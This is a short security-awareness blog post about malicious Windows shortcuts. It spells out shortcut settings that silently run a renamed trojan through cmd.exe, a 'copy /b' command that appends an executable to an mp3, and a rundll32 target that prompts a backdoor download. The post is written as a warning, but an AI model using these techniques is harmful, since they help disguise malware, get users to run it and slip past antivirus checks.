The shortcut virus

Did you ever wonder how powerful is a shortcut ? Or if the computer viruses can be spreaded via shortcuts ? No, this article is not about viruses who are playing with shortcuts on your desktop, making them to run away when you want to click one of them and driving you crazy, this article is about simple shortcuts. For example somebody send you via email as attachment or you download from somewhere a folder with two files in it, a text file and a shortcut to the text file, what are you thinking ? I mean, something like this :


The first impulse is to double click the file entitled “VERY IMPORTANT, read this.txt”, it has a text file extension and icon, but that little arrow from the corner indicate that is a shortcut and not a text file. Even if  we realize it’s a shortcut, the general tendency is to open it because the title is eye catching, despite there is no logic in a text shortcut offered over the Internet. Shortcut for what file ?

Everybody creates the shortcuts locally in the computer and does not offer them for downloading unless is an Intenet Explorer shortcut with an URL embedded in it. So what, where is the danger of a virus infection in a shortcut to a text file, you will ask.

First, look at this shortcut properties:


Setting the shortcut properties as above :

  • Target : %windir%/system32/cmd.exe /c readme.txt –> this one is the most important, will force command.exe to run “readme.txt” file as an executable file, disregarding it is a text file
  • Start in : %currentdir% –>this one will look for the file “readme.txt” in the current folder where is the shortcut located
  • Run : minimized   –>this one will make the whole process invisible to the user, without window

Now all become clear, changing the extension of a trojan virus for example from “exe” to “txt”, the file will appear as inoffensive to the user. It’s obvious that any extension can be used for the virus, as .jpg or .mp3, the command prompt will run the virus as executable resulting the computer infection. This method to spread virus infections is rather old, but still trick users and even some of the antiviruses, who does not see any threat in a jpg(image file) or txt(text) file and does not trigger any virus alert in case of files scanning–simply them are detecting nothing !

Some extra-notes are required about .mp3(music) files. There is reports that says “dirty” mp3 files can be even played in normal music players like Winamp or VLC, the virus file is concatenated with a mp3(music) file with command prompt :

  • copy \b trojan.exe + song.mp3 final_song.mp3

and using a shortcut like the above one, the virus will be executed. In the same time, because of the way the music player works, them will ignore the other code and will find the first valid frame playing it. Read here for deeper detailes.

Changing for example the shortcut property Target in :

  • Target : %windir%\system32\rundll32.exe url.dll,FileProtocolHandler

will result in starting up the default browser and offering for downloading the some_file.exe file which can be any backdoor trojan or virus, tricking the user to download and run it.

If in the future you will pay more attention to the shortcuts, especially the shortcuts provided by others, then this article meet its goal.

The computer shortcuts can be as dangerous as viruses are, more than that can be a part of the computer virus.

Keep safe !

Posted in Thoughts.

One Response

Leave a Reply